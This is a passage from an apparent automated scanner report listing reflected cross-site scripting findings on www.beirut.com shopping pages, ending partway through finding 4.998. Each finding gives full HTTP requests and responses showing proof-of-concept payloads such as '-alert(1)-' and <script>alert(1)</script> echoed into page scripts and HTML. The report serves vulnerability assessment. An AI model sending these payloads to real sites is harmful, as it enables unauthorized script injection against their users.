Request

GET /Shopping/Home-Furnishingsdd7c0'-alert(1)-'72d10295555/4120758082/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:29:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60264

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishingsdd7c0'-alert(1)-'72d10295555/4120758082/Art/2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.986. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 79bf1'-alert(1)-'70f948b9db2 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/412075808279bf1'-alert(1)-'70f948b9db2/Art/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:37:20 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60150

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/412075808279bf1'-alert(1)-'70f948b9db2/Art/2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.987. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 99692'-alert(1)-'1454fc4861e was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Art99692'-alert(1)-'1454fc4861e/2 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:42:04 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60254

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='magenta';
var indexpage='Shopping/Home-Furnishings/4120758082/Art99692'-alert(1)-'1454fc4861e/2';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.988. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Art/2 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Art/2

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload de367'-alert(1)-'5c293ecee8a was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Art/2de367'-alert(1)-'5c293ecee8a HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:46:01 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54939

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='purple';
var indexpage='Shopping/Home-Furnishings/4120758082/Art/2de367'-alert(1)-'5c293ecee8a';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.989. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 2cef3"><a>b68671e9af6 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping2cef3"><a>b68671e9af6/Home-Furnishings/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:09:46 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59894

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping2cef3"><a>b68671e9af6">
...[SNIP]...

4.990. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 7abcd'-alert(1)-'cece5242a0c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping7abcd'-alert(1)-'cece5242a0c/Home-Furnishings/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:36 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60257

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping7abcd'-alert(1)-'cece5242a0c/Home-Furnishings/4120758082/Bedroom-Accessories/51';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.991. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 2 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 2acdd'-alert(1)-'35281a32492 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings2acdd'-alert(1)-'35281a32492/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:18 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61202

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings2acdd'-alert(1)-'35281a32492/4120758082/Bedroom-Accessories/51';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.992. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload e48f2<script>alert(1)</script>1528d971188 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /Shopping/Home-Furnishingse48f2<script>alert(1)</script>1528d971188/4120758082/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:20:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61175

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<p class="main-vista">Home Furnishingse48f2<script>alert(1)</script>1528d971188 <a href="#" id="backlink">
...[SNIP]...

4.993. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 3]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 3 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 4c59d'-alert(1)-'fe6d4e8d198 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/41207580824c59d'-alert(1)-'fe6d4e8d198/Bedroom-Accessories/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:24:47 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61072

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/41207580824c59d'-alert(1)-'fe6d4e8d198/Bedroom-Accessories/51';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.994. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 4]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 4 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ac591'-alert(1)-'ff1539429cf was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Bedroom-Accessoriesac591'-alert(1)-'ff1539429cf/51 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:30:30 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 61174

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping/Home-Furnishings/4120758082/Bedroom-Accessoriesac591'-alert(1)-'ff1539429cf/51';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.995. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51 [REST URL parameter 5]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51

Issue detail

The value of REST URL parameter 5 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload ff205'-alert(1)-'52f1f141fae was submitted in the REST URL parameter 5. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51ff205'-alert(1)-'52f1f141fae HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:34:09 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 54942

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='blue';
var indexpage='Shopping/Home-Furnishings/4120758082/Bedroom-Accessories/51ff205'-alert(1)-'52f1f141fae';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.996. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 1 is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 13dfe'-alert(1)-'6349041a10c was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Remediation detail

Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.

Request

GET /Shopping13dfe'-alert(1)-'6349041a10c/Home-Furnishings/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:27:59 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 59829

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<script type="text/javascript">
var randstyle='green';
var indexpage='Shopping13dfe'-alert(1)-'6349041a10c/Home-Furnishings/4120758082/China-Glassware/7';
var initfacebox='';
var contactid='';
var showfacebox='';
</script>
...[SNIP]...

4.997. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 1]

Summary

Severity:   High
Confidence:   Firm
Host:   http://www.beirut.com
Path:   /Shopping/Home-Furnishings/4120758082/China-Glassware/7

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 6349e"><a>127442d98c4 was submitted in the REST URL parameter 1. This input was echoed unmodified in the application's response.

This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.

Request

GET /Shopping6349e"><a>127442d98c4/Home-Furnishings/4120758082/China-Glassware/7 HTTP/1.1
Host: www.beirut.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close
Cookie: __utmz=52332730.1295922061.1.1.utmcsr=burp|utmccn=(referral)|utmcmd=referral|utmcct=/show/56; PHPSESSID=17jkapsd34tdtfv9m4mr30gs23; fbsetting_98034c63917cb0c0c02f1b9429eaa593=%7B%22connectState%22%3A2%2C%22oneLineStorySetting%22%3A3%2C%22shortStorySetting%22%3A3%2C%22inFacebook%22%3Afalse%7D; __utma=52332730.310658913.1295922061.1295922061.1295922061.1; __utmc=52332730; __utmb=52332730.1.10.1295922061; base_domain_98034c63917cb0c0c02f1b9429eaa593=beirut.com;

Response

HTTP/1.1 200 OK
Date: Tue, 25 Jan 2011 12:16:21 GMT
Server: Apache/2.2.3 (CentOS)
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: private, no-cache, no-store, proxy-revalidate, no-transform
Pragma: no-cache
Vary: User-Agent,Accept,Accept-Encoding
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 60436

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" xmlns:fb="http://www.facebook.com/
...[SNIP]...
<input type="hidden" name="indexpage" id="indexpage" value="Shopping6349e"><a>127442d98c4">
...[SNIP]...

4.998. http://www.beirut.com/Shopping/Home-Furnishings/4120758082/China-Glassware/7 [REST URL parameter 2]

Summary

Severity:   High
Confidence:   Certain
